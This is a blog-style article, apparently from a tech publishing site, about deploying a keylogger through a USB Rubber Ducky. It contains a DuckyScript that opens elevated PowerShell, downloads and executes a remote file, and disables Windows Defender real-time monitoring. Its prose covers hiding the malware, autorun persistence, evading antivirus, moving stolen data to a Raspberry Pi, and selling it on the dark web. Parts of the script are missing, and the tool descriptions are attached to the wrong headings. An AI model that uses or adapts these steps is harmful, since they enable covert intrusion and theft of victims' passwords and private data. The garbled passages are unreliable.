A keylogger is a tool designed to for later retrieval. Its purpose is usually to allow the user of this tool to gain access to confidential information typed by the target or typed in the affected computer such as users' passwords and other private information. Often hackers use viruses trojans and rootkits-like methods to remain active and hidden record every keystroke on a system The amount of info a keylogger can collect by keylogger software can vary by the software used and how complex it is. The most basic program can collect the info only typed by the target and collect it via email or application. More sophisticated keylogger software can collect: Typed Information GPS location IP location Saved data FTP and SSH transfer service Download and upload data In this article, we'll discuss: Program a keylogger in Python Injecting the script Setting up autorun feature Select retrieving information method Tools and things required to execute the attack Risk Preventions Courses on Udemy Program a keylogger in Python You may need Python and C++ even some Arduino and ducky coding engines to run and execute the codes for the keyloggers. Python keylogger uses python to be preinstalled in the victim's system and to have python installed or you may convert it into a binary to be installed in the system any way I am going to explain the dynamics but not how to code the entire thing as even I don't know how to do it don't judge me. well, I am going to suggest a few Udemy courses for that you can check them out if you want to learn how to build a keylogger. Injecting the script If you have written and converted the script to a binary file and uploaded it to a Mediafire, you can download it via a code running in the background using a ducky script. Now, you can have the code and script in one single ducky script that it runs in the background of the system like if code it in such a way that the code uses the os function to do the background using of the tool. Using this you can even stealth your operation by adding the hiding the programs in a location and hiding the folder using the hide function or header Script download and execute the file from a website and disable defender using Powershell: REM Windows : Poweshell administrator download and execute file
REM Author: Judge2020
REM author website: Judge2020.com
REM
REM start script
REM
REM the HID enumerate
DELAY GUI r
DELAY REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY ALT y
DELAY STRING $down = New- System.Net.WebClient; $url = ; $file = ; $down.DownloadFile($url,$file); $exec = New- -com shell.application; $exec.shellexecute($file);
DELAY GUI r
DELAY REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY ALT y 
DELAY STRING -MpPreference -DisableRealtimeMonitoring $ ENTER
STRING exit
ENTER
exit; 10 of let 1000 200 1000 200 Object 'abc.exe' 'mess1.exe' Object 1000 200 1000 200 Set true The above image shows the complete map of how does the hid attack work in detail. Setting up autorun feature Using this code you can add an autorun feature for a file. There are softwares outside that automates the process but for the best result, you can opt for injecting the codes inside another program that you know the target often uses. This can be achieved by adding a new icon on the desktop replacing the already existing icon with it or you can install the autorun feature in the source code. You can even stealth the files by converting the files to binaries and changing the name to another name from the source code only. This way, you can hide this from the task manager and other uses and if you are smart enough you can code it in such a way that the antivirus software does not recognize it as a virus but as a legit application. Setting up the information retrieval mechanism You can select the retrieval method and the way you want to extract the data from the target one of the few options is using ssh and FTP and I think ssh is the best because the name only suggests secured Shell. Its recommended to keep yourself safe to a certain extent from reverse engineering of the application but you can also use FTP to just transfer the files and folders to the Raspberry Pi set-up. To listen and capture the incoming data, this type of keylogger is really dangerous as your data can be transferred in just 1 or 2 hours if the attacker has good internet : You can imagine it as like this ( target view ) I have found a Pendrive fallen Connected to a pc The pc restarts I have found an app on the Pendrive and I run it Nothing happens I remove the Pendrive ( hackers view ) I receive a connection I download the files I intended to install all the malicious files into the targets computer sell the files and info on the dark web Data retrieved I can retrieve: login information web data stored passwords wifi passwords system logs web camera clips photos videos download's list documents and many more....... Tools and things required to execute the attack :- a rubber ducky is a hak5 tool that automates keystroke's when the rubber ducky is connected to a system it portrays itself as a keyboard and starts to inject commands in the victim's system with a superhuman speed in the background and the victim will not even notice it will be over in a second and the hacker will receive a reverse connection. rubber ducky :-If you never connect your computer, you are 100 percent safe from hackers on the internet. There is no way someone can hack and retrieve, alter or monitor information without physical access. This however is not the only way unconnected computers or smartphones can be accessed or monitored. internet :-The Raspberry Pi 4 can do a surprising amount. Amateur tech enthusiasts use Pi boards as media centers, file servers, retro games consoles, routers, and network-level ad-blockers, for starters. Raspberry pi 4 :-u can use any scripting engine from notepad to visual studios for the job. python and c++ scripting engine : you can do ducky scripts in any scripting engine but Arduino uses Arduino engine to write Arduino scripts. ducky and Arduino scripting engine Rubberducky definitions directly copied from Hak5 Hacking is a risky job and you may end up behind bars for doing things such as hacking IT services and other things please do it responsibly by taking permission from the target before doing such a thing. Sources hack5 ) ( RUBBER-DUCK DEFINITION Wikipedia ( KEYLOGGER INFORMATION ) null-byte Github ( DUCKY SCRIPTS ) Follow me Follow my Twitter account for the latest updates Twitter: morpheuslord2 Instagram: morpheuslord_9034 email: morpheuslord@protonmail.com

Instagram

Target

Twitter

Read My Stories

Hire Me

Portfolio

Book a Call

Offensive security engineer (intern)

Too Long; Didn't Read

Questions about cloud security? Get answers here.

Programming a Keylogger in Python

Programming a Keylogger in Python

Too Long; Didn't Read

Companies Mentioned

Morpheuslord

About Author

TOPICS

THIS ARTICLE WAS FEATURED IN...

Programming a Keylogger in Python

Too Long; Didn't Read

Companies Mentioned

Morpheuslord

About Author

TOPICS

THIS ARTICLE WAS FEATURED IN...

RELATED STORIES